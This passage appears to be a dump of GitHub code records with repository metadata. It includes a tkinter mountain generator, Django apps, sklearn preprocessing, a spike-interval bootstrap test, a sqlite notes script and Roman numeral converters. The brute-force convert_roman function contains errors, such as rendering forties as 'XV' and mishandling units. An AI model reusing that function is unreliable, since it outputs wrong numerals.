从p1到位移后的中点pc进行细分,迭代次数减一\r\n left_half = self.midpoint_displacement(p1, pc, iterations - 1)\r\n\r\n # 2. 从位移后的中点pc到p2进行细分,迭代次数减一\r\n right_half = self.midpoint_displacement(pc, p2, iterations - 1)\r\n\r\n # 返回两个子问题的结果连接起来,中间插入位移后的中点pc\r\n return left_half + [pc] + right_half\r\n\r\n # 交互式中点位移,用于可视化生成山脉的过程\r\n def interactive_midpoint_displacement(self, p1, p2, sleep=0.1):\r\n # 初始化一个点列表,开始时包含起点p1和终点p2\r\n self.points = [p1, p2]\r\n\r\n # 初始化标志变量flag为True,用于控制迭代循环\r\n flag = True\r\n\r\n # 在GUI上绘制初始线段,颜色为黑色\r\n self.canvas.create_line(self.points, fill=\"black\")\r\n\r\n # 更新GUI显示\r\n self.canvas.update()\r\n\r\n # 暂停一段时间,以便观察初始线段\r\n time.sleep(sleep)\r\n\r\n # 进入循环,不断进行中点位移并更新GUI显示\r\n while flag:\r\n # 复制当前点列表,以便在迭代中修改\r\n points_new = self.points.copy()\r\n\r\n # 对当前点列表中的每对相邻点进行中点位移操作\r\n for i in range(len(self.points) - 1):\r\n pc = self.displace_point(self.points[i], self.points[i + 1])\r\n\r\n # 如果位移后的中点pc等于当前点中的起点,表示不需要再细分,退出循环\r\n if pc == self.points[i]:\r\n flag = False\r\n continue\r\n\r\n # 更新新的点列表,将位移后的中点pc插入到适当的位置\r\n points_new = points_new[:i + 1] + [pc] + points_new[i + 1:]\r\n\r\n # 更新当前点列表为新的点列表\r\n self.points = points_new\r\n\r\n # 在GUI上绘制新的线段,颜色为黑色\r\n self.canvas.create_line(self.points, fill=\"black\")\r\n\r\n # 更新GUI显示\r\n self.canvas.update()\r\n\r\n # 暂停一段时间,以便观察迭代过程\r\n time.sleep(sleep)\r\n\r\n # 循环结束后,打印 \"Finished\" 表示生成过程完成\r\n print(\"Finished\")\r\n\r\n # 重置画布\r\n def reset_code(self):\r\n # 使用GUI画布的delete方法,删除所有在画布上的图形元素,\"all\"表示删除所有\r\n self.canvas.delete(\"all\")\r\n\r\n # 将对象的属性 self.points 重置为空列表,用于存储点坐标\r\n self.points = []\r\n\r\n # 生成山脉\r\n def build_mountains(self):\r\n # 重置画布和点列表\r\n self.reset_code()\r\n\r\n # 随机生成两个山峰的高度\r\n h1 = random.randint(100, 400)\r\n h2 = random.randint(100, 400)\r\n\r\n # 定义山峰的x坐标\r\n xh1 = 6\r\n xh2 = 994\r\n\r\n # 在画布上创建表示山峰的红色圆形点\r\n self.canvas.create_oval(xh2 - 3, h2 - 3, xh2 + 3, h2 + 3, fill=\"red\", outline='black')\r\n\r\n # 将山峰的坐标添加到点列表中\r\n self.points.append([xh1, h1])\r\n self.points.append([xh2, h2])\r\n\r\n # 根据是否交互模式,选择不同的方法生成山脉\r\n if self.interactive:\r\n # 在交互模式下,使用 interactive_midpoint_displacement 方法生成山脉\r\n self.interactive_midpoint_displacement(self.points[0], self.points[1])\r\n else:\r\n # 在非交互模式下,使用 midpoint_displacement 方法生成山脉\r\n self.points = self.midpoint_displacement(self.points[0], self.points[1], self.iterations)\r\n for i in range(len(self.points) - 1):\r\n # 在画布上绘制连接点的线段\r\n self.canvas.create_line(self.points[i][0], self.points[i][1], self.points[i + 1][0],\r\n self.points[i + 1][1])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n root = tk.Tk()\r\n root.title(\"Mountain Generator\")\r\n\r\n canvas = tk.Canvas(root, width=1000, height=600)\r\n canvas.pack()\r\n\r\n generator = MountainGenerator(canvas, interactive=True) # 设置 interactive 为 False 以使用非交互模式\r\n\r\n # 创建生成山脉按钮\r\n btn_generate = tk.Button(root, text=\"生成山脉\", command=generator.build_mountains)\r\n btn_generate.pack(side=\"right\")\r\n\r\n # 创建重置画布按钮\r\n btn_reset = tk.Button(root, text=\"重置画布\", command=generator.reset_code)\r\n btn_reset.pack(side=\"right\")\r\n\r\n r = tk.DoubleVar()\r\n r.set(0.4)\r\n\r\n label = tk.Label(root, text=\"粗糙度: 0.25\")\r\n label.pack(side=\"left\")\r\n\r\n # 创建粗糙度调节滑块\r\n scale = tk.Scale(root, from_=0, to=1.0, resolution=0.01, orient=\"horizontal\", variable=r)\r\n scale.pack(side=\"left\")\r\n\r\n # 迭代次数输入框\r\n iterations_label = tk.Label(root, text=\"迭代次数:\")\r\n iterations_label.pack(side=\"left\")\r\n iterations_entry = tk.Entry(root)\r\n iterations_entry.pack(side=\"left\")\r\n 
iterations_entry.insert(0, \"3\") # 设置默认迭代次数\r\n\r\n\r\n # 确认按钮,用于设置迭代次数\r\n def set_iterations():\r\n try:\r\n iterations = int(iterations_entry.get())\r\n generator.set_iterations(iterations)\r\n except ValueError:\r\n pass\r\n\r\n\r\n # 确认按钮\r\n iterations_button = tk.Button(root, text=\"确认\", command=set_iterations)\r\n iterations_button.pack(side=\"left\")\r\n\r\n root.mainloop()\r\n","repo_name":"Dengchunwei001/Task5","sub_path":"lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26279381282","text":"import pandas as pd\nfrom sklearn.compose import ColumnTransformer\n# from sklearn.decomposition import PCA\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.compose import make_column_selector as selector\n\n\ndef no_string_cols(df):\n '''REMOVING STRING COLUMNS'''\n cols_to_remove = []\n\n for col in df.columns:\n try:\n _ = df[col].astype(float)\n except ValueError:\n print('Couldn\\'t convert %s to float' % col)\n cols_to_remove.append(col)\n pass\n\n # keep only the columns in df that do not contain string\n df = df[[col for col in df.columns if col not in cols_to_remove]]\n return df\n\n\ndef data_extract(csv_path):\n '''DATA EXTRACTION'''\n df = pd.read_csv(csv_path)\n\n # df = df.dropna(axis=1, thresh=len(df.values)/1.5) # dropping columns where 1/3 is Nan or more)\n # df = df.fillna(df.mean()) # imputing missing numerical values with feature means\n # df = df.drop(1379) # df[1379]['Electrical'] is the only empty string in the column\n\n X = df.drop(['Id'], axis=1)\n # X = X.drop(ordinal_columns_str, axis=1)\n y = None\n\n if csv_path == '../HousePrices/tests/train.csv':\n X = X.drop(['SalePrice'], axis=1)\n y = df['SalePrice']\n\n return X, y\n\n\ndef data_preprocessor():\n '''NUMERIC AND CATEGORICAL VALUES HANDLING (EXCEPT ORDINAL - DONE SEPARATELY)'''\n numeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler()),\n # (\"pca\", PCA(n_components=6))\n ])\n\n '''HANDLING CATEGORICAL DATA'''\n categorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='most_frequent')),\n ('onehot', OneHotEncoder(categories='auto', drop='first'))\n ])\n\n '''OVERALL PREPROCESSING - COLUMN TRANSFORMATION'''\n preprocessor = ColumnTransformer(transformers=[\n ('num', numeric_transformer, selector(dtype_exclude=object)),\n ('cat', categorical_transformer, selector(dtype_include=object))\n ])\n\n return preprocessor\n","repo_name":"AndreyGates/HousePrices","sub_path":"src/houseprices/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40995244252","text":"from django.contrib import admin\nfrom django.core.exceptions import ValidationError\nfrom django.forms import BaseInlineFormSet\n\nfrom .models import Article, Tabel, Scope\n\n@admin.register(Scope)\nclass ScopeAdmin(admin.ModelAdmin):\n pass\n\nclass TableInlineFormset(BaseInlineFormSet):\n\n def clean(self):\n super(TableInlineFormset, self).clean()\n total_checked = 0\n for form in self.forms:\n if not form.is_valid():\n return\n if form.cleaned_data and not form.cleaned_data.get('DELETE'):\n if form.cleaned_data['is_main']:\n total_checked += 1\n if total_checked > 1:\n raise 
ValidationError('У же есть один основной раздел, выебирте один!')\n\n if total_checked < 1:\n raise ValidationError(\"Вам необходимо выбрать один основной раздел!\")\n\n return super().clean() # вызываем базовый код переопределяемого метода\n\n\nclass TableInline(admin.TabularInline):\n model = Tabel\n formset = TableInlineFormset\n\n\nclass ArticleAdmin(admin.ModelAdmin):\n\n inlines = [\n TableInline\n ]\n\nadmin.site.register(Article, ArticleAdmin)\n","repo_name":"Shatilov789/django_m2m","sub_path":"articles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"ru","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"74036868722","text":"from csv_app.models import (Dataschema, \n\t\t\t\t\t\t\tColumn, \n\t\t\t\t\t\t\tTypestatus, \n\t\t\t\t\t\t\tTypetime, \n\t\t\t\t\t\t\tTypescore, \n\t\t\t\t\t\t\tUser,\n\t\t\t\t\t\t\tContentType)\n\ndef get_filters_dict(dict_request):\n\t# delete pairs of key value from request.QueryDict\n\t# to pass new dict to save it in DB\n\tdeleted_keys = [ \"name\",\n\t\t\t\t\t \"column_separator\",\n\t\t\t\t\t \"string_cherecter\",\n\t\t\t\t\t \"csrfmiddlewaretoken\"]\n\treturn {key:value for (key, value) in dict_request.items() \\\n\t\t\tif key not in deleted_keys}\n\ndef save_filters(dict_request, user_name, name_schema):\n\t'''\n\tsave filters to db\n\t'''\n\t# key patterns for dict_request\n\t# STATE ROW CONST\n\tSTATE_SELECT = \"name_select_state_1\"\n\t# TIME ROW CONST\n\tTIME_SELECT = \"match_type_\"\n\tTIME_INPUT_FROM = \"time_name_from_\"\n\tTIME_INPUT_TO = \"time_name_to_\"\n\t# STATE ROW CONST\n\tSCORE_SELECT = \"score_type_select_\"\n\tSCORE_COMPAIR = \"compair_\"\n\t# total, home, guest consts\n\tSCORE_INPUT_VALUE = \"score_input_name_\"\n\t# compairson consts\n\tSCORE_INPUT_HOME = \"score_name_home_\"\n\tSCORE_INPUT_GUEST = \"score_name_guest_\"\n\t#COLUMN NAMES\n\tINIT = 'Select matches '\n\t#time dict\n\tTIME_NAME = {\n\t\t'n': \"Filter from matches now from valfrom to valto\",\n\t\t't': \"Filter matches from time table from valfrom to valto\"\n\t}\n\t# score name dicts\n\tSCORE_NAME_COMMON = \"Filter all mathes where \"\n\t# create init Col which is parent for otherone\n\t# get Userprofile inst\n\tuserprofile = User.objects.get(username=user_name).userprofile\n\t# get Schema\n\tDATA_SCHEMA = \\\n\t\tDataschema.objects.filter(profile=userprofile).get(name=name_schema)\n\t# create Typestatus row\n\t# get value from dict_request\n\tcol_type_item = dict_request.pop(STATE_SELECT)\n\ttype_status_obj = Typestatus.objects.create(matchestate=col_type_item)\n\t# set name. 
Typestatus.STATES has all avliable names\n\tname = f'{INIT}{dict(Typestatus.STATES).get(col_type_item)}'\n\tcolumn_obj = Column.objects.create(\n\t\tlogicoperator = 'and',\n\t\tname = name,\n\t\torder = \"1\",\n\t\tdataschema = DATA_SCHEMA,\n\t\tcontent_object=type_status_obj\n\t\t)\n\t# init list with orders\n\tsaved_parent_order_list = [(1,)]\n\tis_list_not_empty = True\n\t# this while goes throught orders to append +1 to last element in the order\n\twhile is_list_not_empty:\n\t\t#extract first element\n\t\torder = saved_parent_order_list.pop(0)\n\t\t# get column to set it as parent for next col if exists\n\t\tparent_obj = DATA_SCHEMA.related_column.get(order=\\\n\t\t\t\t\t\t\t\t\t\t\t\"_\".join((str(i) for i in order)))\n\t\t#add '1' to end of typle\n\t\torder = list(order) + [1]\n\t\tis_next = True\n\t\t# this while goes throw orders to add +1 to last element in the order\n\t\twhile is_next:\n\t\t\tno_error = True\n\t\t\tstr_order = \"_\".join((str(i) for i in order))\n\t\t\t# try parse Typetime\n\t\t\ttry:\n\t\t\t\ttime_type = dict_request.pop(f'{TIME_SELECT}{str_order}')\n\t\t\t\ttime_from = dict_request.pop(f'{TIME_INPUT_FROM}{str_order}')\n\t\t\t\ttime_to = dict_request.pop(f'{TIME_INPUT_TO}{str_order}')\n\t\t\t\ttype_obj = Typetime.objects.create(\n\t\t\t\t\tmatch_status = time_type,\n\t\t\t\t\tvalfrom = str(time_from),\n\t\t\t\t\tvalto = str(time_to))\n\t\t\t\t# define name for new Col obj\n\t\t\t\tname = TIME_NAME.get(time_type)\n\t\t\t\tname = name.replace(\"valfrom\", time_from)\n\t\t\t\tname = name.replace(\"valto\", time_to)\n\t\t\texcept KeyError:\n\t\t\t\t# else try parse Typescore\n\t\t\t\ttry:\n\t\t\t\t\tscore_type = dict_request.pop(f'{SCORE_SELECT}{str_order}')\n\t\t\t\t\t# filter_name = dict_request.pop(f'{SCORE_SELECT}{str_order}')\n\t\t\t\t\tscore_compair = \\\n\t\t\t\t\t\tdict_request.pop(f'{SCORE_COMPAIR}{str_order}')\n\t\t\t\t\tval_score, val_first, val_second = False, False, False\n\t\t\t\t\tif dict_request.get(f'{SCORE_INPUT_VALUE}{str_order}'):\n\t\t\t\t\t\tval_score = \\\n\t\t\t\t\t\t\tdict_request.pop(f'{SCORE_INPUT_VALUE}{str_order}')\n\t\t\t\t\t\ttail_score_name = dict(Typescore.TOTAL).get(score_type)+\\\n\t\t\t\t\t\t\t\t\t\t'score ' + score_compair + val_score\n\t\t\t\t\telse:\n\t\t\t\t\t\tval_first = \\\n\t\t\t\t\t\t\tdict_request.pop(f'{SCORE_INPUT_HOME}{str_order}')\n\t\t\t\t\t\tval_second = \\\n\t\t\t\t\t\t\tdict_request.pop(f'{SCORE_INPUT_GUEST}{str_order}')\n\t\t\t\t\t\ttail_score_name = ' home score ' + val_first + score_compair +\\\n\t\t\t\t\t\t\t\t\t\t' guest score ' + val_second\n\t\t\t\t\tname = f'{SCORE_NAME_COMMON}{tail_score_name}'\n\t\t\t\t\t# create Typescore onj\n\t\t\t\t\ttype_obj = Typescore.objects.create(\n\t\t\t\t\t\t\tscore = score_type,\n\t\t\t\t\t\t\tcomparison = score_compair,\n\t\t\t\t\t\t\tvalfirst = \\\n\t\t\t\t\t\t\t\tint(val_score) \\\n\t\t\t\t\t\t\t\tif score_type in ['t', 'h', 'g'] \\\n\t\t\t\t\t\t\t\telse int(val_first),\n\t\t\t\t\t\t\tvalsecond = val_second if score_type == 'c' else 0)\n\t\t\t\texcept KeyError:\n\t\t\t\t\tis_next, no_error = False, False\n\t\t\tif no_error:\n\t\t\t\tcl = Column.objects.create(\n\t\t\t\t\t\tlogicoperator='or',\n\t\t\t\t\t\tname=name,\n\t\t\t\t\t\torder=str_order,\n\t\t\t\t\t\tdataschema=DATA_SCHEMA,\n\t\t\t\t\t\tcontent_object=type_obj,\n\t\t\t\t\t\tparent=parent_obj\n\t\t\t\t\t\t)\n\t\t\t\t# add new order to saved_parent_order_list\n\t\t\t\tsaved_parent_order_list.append(tuple(order.copy()))\n\t\t\t\t# try to find next\n\t\t\t\torder[-1] = order[-1] + 1\n\t\t# check is list 
Empty\n\t\tis_list_not_empty = True if len(saved_parent_order_list) > 1 else False\n\n\n\n","repo_name":"citieslg/csv_parser","sub_path":"csv_app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3683012755","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nimport os\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('profiles/', include('django.contrib.auth.urls')),\n path('profiles/', include('profiles.urls')),\n path('', include('site_layout.urls')),\n path('shop/', include('shop.urls')),\n path('workshop/', include('repairs_restorals.urls')),\n path('invoices/', include('invoices.urls')),\n]\n\nadmin.site.site_header = \"Goat and Daisy\"\nadmin.site.index_title = \"Antique Shop and Repairs Admin Panel\"\n\n# if AWS isn't being used...\nif not \"USE_AWS\" in os.environ:\n # ...and debug is True...\n if settings.DEBUG:\n # the media_url is set to MEDIA_ROOT in settings\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"Mishalzeera/goat-and-daisy-antiques","sub_path":"goat_and_daisy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74592434803","text":"\nimport pdb\nimport sys\nimport argparse\nimport numpy as np\nimport plotly.graph_objects as go\nimport plotly.subplots\nsys.path.append(\"../src\")\nimport resampling\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--nResamples\", \n help=\"number of resamples for bootstrap hypothesis test\",\n type=int,\n default=2000)\n parser.add_argument(\"--max_ISI_in_hist\", \n type=float,\n default=500)\n parser.add_argument(\"--max_ISI_to_plot\", \n type=float,\n default=150)\n parser.add_argument(\"--num_bins\", \n type=int,\n default=30)\n parser.add_argument(\"--data_filename\", \n help=\"data filename\",\n default=\"../../data/66A_int13_14.npz\")\n parser.add_argument(\"--fig_filename_pattern\", \n help=\"figure filename pattern\",\n default=\"../../figures/diffParamsInvGaussianModel_{:s}.{:s}\")\n args = parser.parse_args()\n\n nResamples = args.nResamples\n max_ISI_in_hist = args.max_ISI_in_hist\n max_ISI_to_plot = args.max_ISI_to_plot\n num_bins = args.num_bins\n data_filename = args.data_filename\n fig_filename_pattern = args.fig_filename_pattern\n\n load_res = np.load(data_filename, allow_pickle=True)\n female1_spike_times = load_res[\"Female1_2_spikes_times\"]\n female2_spike_times = load_res[\"Female2_2_spikes_times\"]\n\n female1_ISIs = np.diff(female1_spike_times)\n female1_ISIs[np.where(female1_ISIs==0)[0]] = 1.0 # fixing problem due to storing spike times in milliseconds\n female2_ISIs = np.diff(female2_spike_times)\n female2_ISIs[np.where(female2_ISIs==0)[0]] = 1.0 # fixing problem due to storing spike times in milliseconds\n\n all_ISIs = np.hstack((female1_ISIs, female2_ISIs))\n\n def difference_lambda(samples,\n Nfemale1=len(female1_ISIs),\n NFemale2=len(female2_ISIs)):\n female1_ISIs = samples[:Nfemale1]\n female2_ISIs = samples[Nfemale1:]\n female1_mu = female1_ISIs.mean()\n female1_lambda = 1/(1/female1_ISIs-1/female1_mu).mean()\n female2_mu = female2_ISIs.mean()\n female2_lambda = 1/(1/female2_ISIs-1/female2_mu).mean()\n lambda_diff = female1_lambda-female2_lambda\n 
return lambda_diff\n\n observed_difference_lambda = difference_lambda(samples=all_ISIs)\n null_hyp_samples_lambda = resampling.get_bootstrap_sample(\n sample=all_ISIs, statistic=difference_lambda, nResamples=nResamples)\n sign_lambda = resampling.compute_bootstrap_HT_sign(\n null_hyp_samples=null_hyp_samples_lambda,\n observed=observed_difference_lambda,\n two_sided=True)\n\n def difference_mu(samples,\n Nfemale1=len(female1_ISIs),\n NFemale2=len(female2_ISIs)):\n female1_ISIs = samples[:Nfemale1]\n female2_ISIs = samples[Nfemale1:]\n female1_mu = female1_ISIs.mean()\n female2_mu = female2_ISIs.mean()\n mu_diff = female1_mu-female2_mu\n return mu_diff\n\n observed_difference_mu = difference_mu(samples=all_ISIs)\n null_hyp_samples_mu = resampling.get_bootstrap_sample(\n sample=all_ISIs, statistic=difference_mu, nResamples=nResamples)\n sign_mu = resampling.compute_bootstrap_HT_sign(\n null_hyp_samples=null_hyp_samples_mu,\n observed=observed_difference_mu,\n two_sided=True)\n\n title = \"Significance (two-sided): {:.04f}\".format(sign_lambda)\n hist_trace = trace0 = go.Histogram(x=null_hyp_samples_lambda, nbinsx=num_bins, histnorm='probability')\n fig = go.Figure()\n fig.add_trace(hist_trace)\n fig.add_vline(x=observed_difference_lambda, line_dash=\"dash\")\n fig.update_layout(title=title)\n fig.update_xaxes(title_text=r\"$\\lambda$\")\n fig.update_yaxes(title_text=\"Probability\")\n\n html_fig_filename = fig_filename_pattern.format(\"lambda\", \"html\")\n png_fig_filename = fig_filename_pattern.format(\"lambda\", \"png\")\n fig.write_html(html_fig_filename)\n fig.write_image(png_fig_filename)\n\n fig.show()\n\n title = \"Significance (two-sided): {:.04f}\".format(sign_mu)\n hist_trace = trace0 = go.Histogram(x=null_hyp_samples_mu, nbinsx=num_bins, histnorm='probability')\n fig = go.Figure()\n fig.add_trace(hist_trace)\n fig.add_vline(x=observed_difference_mu, line_dash=\"dash\")\n fig.update_layout(title=title)\n fig.update_xaxes(title_text=r\"$\\mu$\")\n fig.update_yaxes(title_text=\"Probability\")\n\n html_fig_filename = fig_filename_pattern.format(\"mu\", \"html\")\n png_fig_filename = fig_filename_pattern.format(\"mu\", \"png\")\n fig.write_html(html_fig_filename)\n fig.write_image(png_fig_filename)\n\n fig.show()\n\n pdb.set_trace()\n\nif __name__==\"__main__\":\n main(sys.argv)\n","repo_name":"joacorapela/singleNeuronSpikesAnalysisTutorial","sub_path":"code/scripts/doTestDiffParamInvGaussianModels.py","file_name":"doTestDiffParamInvGaussianModels.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"14185014776","text":"from datetime import datetime\nimport sqlite3\nfrom sqlite3 import Error\nimport pathlib\n\ndef create_connection(db_file):\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n except Error as e:\n print(e)\n return conn\n\ndef create_note(conn, note):\n sql = '''INSERT INTO notes(note_time, note_data) VALUES (?,?)'''\n cur = conn.cursor()\n cur.execute(sql, note)\n return cur.lastrowid\n\ndef main():\n note = input('Write:: ')\n current_path = pathlib.Path().absolute()\n database_path = str(current_path) + '/database.sqlite3'\n conn = create_connection(database_path)\n with conn:\n note_data = (str(datetime.now()), note)\n create_note(conn, note_data)\n\n\nif __name__=='__main__':\n 
main()\n","repo_name":"pieas-asif/mixedNotes","sub_path":"mixedNotes.py","file_name":"mixedNotes.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"12468130504","text":"from django.contrib.auth.views import LoginView\nfrom django.shortcuts import redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import CreateView\nfrom .forms import UserRegisterForm, UserLoginForm\nfrom django.contrib import messages\nfrom django.contrib.auth import login, logout\n\n\nclass RegisterUser(CreateView):\n form_class = UserRegisterForm\n template_name = 'users/register.html'\n success_url = reverse_lazy('login')\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Регистрация'\n return context\n\n def form_valid(self, form):\n user = form.save()\n login(self.request, user)\n return redirect('home')\n\n\nclass LoginUser(LoginView):\n form_class = UserLoginForm\n template_name = 'users/login.html'\n\n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Авторизация'\n return context\n\n def get_success_url(self):\n return reverse_lazy('home')\n\n\ndef user_logout(request):\n logout(request)\n return redirect('users:login')\n","repo_name":"seroglazkinpavel/attestation","sub_path":"recipes/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31961134812","text":"from datetime import datetime as time\n\nroman_list = {1: \"I\", 4: \"IV\", 5: \"V\", 9: \"IX\", 10: \"X\", 40: \"XL\", 50: \"L\", 90: \"XC\",\n 100: \"C\", 400: \"CD\", 500: \"D\", 900: \"CM\", 1000: \"M\"}\n\n\"\"\"\nA brute force method\n\"\"\"\n\n\ndef convert_roman(num, roman=\"\"):\n \"\"\"\n This function takes an integer input below 4000 and returns its Roman Numeral equivalent\n :param num: 1904\n :param roman: null\n :return: MCMIV\n \"\"\"\n if num - 1000 >= 0:\n count = num - 1000\n if count == 0:\n roman += roman_list.get(1000)\n else:\n for i in range(num // 1000):\n roman += roman_list.get(1000)\n return convert_roman(num % 1000, roman)\n elif num - 1000 < 0:\n if num in range(900, 1000):\n roman += \"CM\"\n return convert_roman(num % 100, roman)\n elif num > 500:\n count = num - 500\n roman += roman_list.get(500)\n for i in range(count // 100):\n roman += roman_list.get(100)\n return convert_roman(num % 100, roman)\n elif num == 500:\n roman += roman_list.get(500)\n elif num in range(400, 500):\n roman += \"CD\"\n return convert_roman(num % 100, roman)\n elif num > 100:\n for i in range(num // 100):\n roman += roman_list.get(100)\n return convert_roman(num % 10, roman)\n elif num == 100:\n roman += roman_list.get(100)\n return convert_roman(num % 10, roman)\n elif num > 50:\n count = num - 50\n roman += roman_list.get(50)\n for i in range(count // 10):\n roman += roman_list.get(10)\n return convert_roman(num % 10, roman)\n elif num == 50:\n roman += roman_list.get(50)\n elif num in range(40, 50):\n roman += \"XV\"\n return convert_roman(num % 10, roman)\n elif num > 10:\n for i in range(num // 10):\n roman += roman_list.get(10)\n return convert_roman(num % 10, roman)\n elif num == 10:\n roman += roman_list.get(10)\n return convert_roman(num % 10, roman)\n elif num > 5:\n count = num - 5\n roman += roman_list.get(5)\n for i in 
range(count // 10):\n roman += roman_list.get(1)\n elif num == 5:\n roman += roman_list.get(5)\n elif num == 4:\n roman += \"IV\"\n elif num > 1:\n for i in range(num):\n roman += roman_list.get(1)\n elif num == 1:\n roman += roman_list.get(1)\n else:\n pass\n return roman\n\n\n\"\"\"\nA different approach\n\"\"\"\n\n\ndef num_splitter(num):\n \"\"\"\n This function takes a number and splits it into component digits and then returns a dictionary of the digit and its\n position with the position as the key\n :param num: 3210\n :return: {1000:3, 100:2, 10:1, 1:0}\n \"\"\"\n num1 = [int(d) for d in str(num)]\n num_dict = {}\n length = len(num1)\n for i in num1:\n num_dict.update({10 ** (length - 1): i})\n length -= 1\n return num_dict\n\n\ndef roman_converter(num):\n \"\"\"\n This function converts the number to its roman numeral equivalent\n :param num: 1904\n :return: MCMIV\n \"\"\"\n if num < 4000:\n roman = \"\"\n num_dict = num_splitter(num)\n numbers = [key * num_dict[key] for key in num_dict]\n for number in numbers:\n if number > 1000:\n roman += roman_list.get(1000)\n for i in range((number - 1000) // 1000):\n roman += roman_list.get(1000)\n elif number in roman_list:\n roman += roman_list[number]\n else:\n place = 0\n for keys in roman_list:\n if keys > number:\n place = keys\n break\n if place < 10:\n if number > 5:\n roman += roman_list.get(5)\n for i in range(number - 5):\n roman += roman_list.get(1)\n else:\n for i in range(number):\n roman += roman_list.get(1)\n elif place < 100:\n if number > 50:\n roman += roman_list.get(50)\n for i in range((number - 50) // 10):\n roman += roman_list.get(10)\n else:\n for i in range(number // 10):\n roman += roman_list.get(10)\n elif place < 1000:\n if number > 500:\n roman += roman_list.get(500)\n for i in range((number - 500) // 100):\n roman += roman_list.get(100)\n else:\n for i in range(number // 100):\n roman += roman_list.get(100)\n return roman\n else:\n return \"We currently do not allow numbers larger than or equal to 4000\"\n\n\"\"\"\nA new and smaller method with divmod\n\"\"\"\n\nNUMERAL_TO_ROMAN = [(1000, \"M\"), (900, \"CM\"), (500, \"D\"), (400, \"CD\"),\n (100, \"C\"), (90, \"XC\"), (50, \"L\"), (40, \"XL\"),\n (10, \"X\"), (9, \"IX\"), (5, \"V\"), (4, \"IV\"), (1, \"I\")]\n\n\ndef _convert_to_roman_numeral(number: int) -> str:\n \"\"\"Convert number to a roman numeral string\"\"\"\n result = list()\n for numeral, roman in NUMERAL_TO_ROMAN:\n count, number = divmod(number, numeral)\n result.append(roman * count)\n return \"\".join(result)\n\n\n# Calculates the time taken to run both the methods in microseconds\nt1 = time.now().microsecond\nprint(convert_roman(1000))\nt2 = time.now().microsecond\nprint(roman_converter(1000))\nt3 = time.now().microsecond\nprint(_convert_to_roman_numeral(1000))\nt4 = time.now().microsecond\n# Print the times\nprint(t2 - t1)\nprint(t3 - t2)\nprint(t4 - t3)\n# Print the improvement of the second approach over the first\nprint(round((abs((t3 - t2) - (t2 - t1)) / (t2 - t1)) * 100, 2)) # Comparison of 2nd and 1st method\nprint(round((abs((t4 - t3) - (t3 - t2)) / (t3 - t2)) * 100, 2)) # Comparison of 3rd and 2nd method\nprint(round((abs((t4 - t3) - (t2 - t1)) / (t2 - t1)) * 100, 2)) # Comparison of 3rd and 1st method\n","repo_name":"sathyaghan/Code_Optimization","sub_path":"RomanNumeral.py","file_name":"RomanNumeral.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10089395726","text":"\nimport 
os\n\n\"\"\"\nGets an environment variable and closes the program if it doesn't exist.\n\"\"\"\ndef get_env_or_exit(name):\n # Get the variable if possible\n var = os.environ.get(name, None)\n # If it doesn't exist, print a warning and exit\n if var == None:\n print(f\"Looking Glass can't work without the environment variable {name} being set.\")\n print(\"Please set this variable and restart the Looking Glass server.\")\n exit()\n # Otherwise, return the variable\n return var","repo_name":"githubcatw/looking-glass-public","sub_path":"server/common/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31441262650","text":"from django.db import models\n\n# Create your models here.\n\n\ndef get_default_following():\n return {\"following\": []}\n\n\ndef get_default_followers():\n return {\"followers\": []}\n\n\nclass ClonestagramUser(models.Model):\n username = models.CharField(max_length=200)\n email = models.EmailField()\n password = models.CharField(max_length=250)\n following = models.JSONField(default=get_default_following)\n followers = models.JSONField(default=get_default_followers)\n profile_image = models.CharField(max_length=500, default=\"default\")\n date_registered = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['id']\n\n def __str__(self):\n return self.username\n\n\nclass Post(models.Model):\n author = models.ForeignKey(ClonestagramUser, on_delete=models.CASCADE)\n post_text = models.TextField()\n date_posted = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['id']\n\n def __str__(self):\n return self.post_text\n\n\nclass PostImage(models.Model):\n post = models.ForeignKey(Post, on_delete=models.CASCADE)\n 